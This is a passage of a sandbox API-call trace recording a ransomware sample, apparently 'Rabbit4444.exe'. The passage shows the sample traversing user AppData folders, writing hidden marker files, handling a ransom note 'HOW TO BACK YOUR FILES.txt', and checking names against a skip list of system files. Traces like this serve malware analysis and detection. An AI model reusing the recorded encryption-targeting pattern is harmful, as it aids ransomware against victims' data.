lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache" [0066.308] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache\\" [0066.308] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0066.308] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.310] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.312] FlushFileBuffers (hFile=0x228) returned 1 [0066.313] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.313] CloseHandle (hObject=0x228) returned 1 [0066.313] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache") returned 98 [0066.313] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.314] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d94c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0d98887, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0066.314] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.314] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.314] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.314] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.314] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d94c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0d98887, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.314] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.314] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.314] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.314] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.314] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.314] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0d98887, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0d98887, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0d98887, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.314] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.314] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.314] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0d98887, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0d98887, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0d98887, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.314] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0066.314] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.314] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.315] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.315] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.315] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.315] CloseHandle (hObject=0x27c) returned 1 [0066.315] CloseHandle (hObject=0x228) returned 1 [0066.315] GetCurrentThreadId () returned 0xd98 [0066.315] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0066.315] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData" [0066.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0066.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0066.315] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData" [0066.315] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData\\" [0066.316] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0066.316] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.316] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.319] FlushFileBuffers (hFile=0x228) returned 1 [0066.319] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.319] CloseHandle (hObject=0x228) returned 1 [0066.320] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData") returned 95 [0066.320] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.320] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8255f469, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d945b1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0d98887, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0066.320] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.320] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.320] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.320] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.320] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8255f469, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d945b1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0d98887, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.320] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.320] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.320] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.320] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.320] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.320] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0d98887, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0d98887, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0d98887, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.320] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.320] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.321] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0d98887, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0d98887, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0d98887, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.321] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0066.321] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.321] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.321] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.321] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.322] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.322] CloseHandle (hObject=0x27c) returned 1 [0066.322] CloseHandle (hObject=0x228) returned 1 [0066.322] GetCurrentThreadId () returned 0xd98 [0066.322] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0066.322] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC" [0066.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122780 | out: hHeap=0xe0000) returned 1 [0066.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0066.322] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC" [0066.322] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\" [0066.322] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0066.322] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.326] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.328] FlushFileBuffers (hFile=0x228) returned 1 [0066.330] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.330] CloseHandle (hObject=0x228) returned 1 [0066.331] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC") returned 90 [0066.331] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.331] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3722267d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf0dbeb56, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0066.331] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.331] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.331] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.331] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.331] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3722267d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf0dbeb56, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.331] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.331] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.331] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.331] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.331] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.331] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0dbeb56, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0dbeb56, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0dbeb56, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.331] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.332] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.332] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d927d2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x825856ce, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0066.332] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.332] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.332] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0066.332] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0066.332] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0066.332] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0066.332] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0066.332] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0066.332] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0066.332] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0066.332] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0066.332] lstrcpyW (in: lpString1=0x130ebee, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0066.332] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0066.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0066.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xca) returned 0x108838 [0066.333] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x11cd48 [0066.333] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d92f43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x825856ce, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0066.333] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.333] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.333] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0066.333] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0066.333] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0066.333] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0066.333] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0066.333] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0066.333] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0066.333] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0066.333] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0066.333] lstrcpyW (in: lpString1=0x130ebee, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0066.333] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0066.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0066.334] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xce) returned 0x108688 [0066.334] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x122008 [0066.334] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d9368b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x825856ce, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0066.334] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.334] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.334] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0066.334] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0066.334] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0066.334] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0066.334] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0066.334] lstrcmpiW 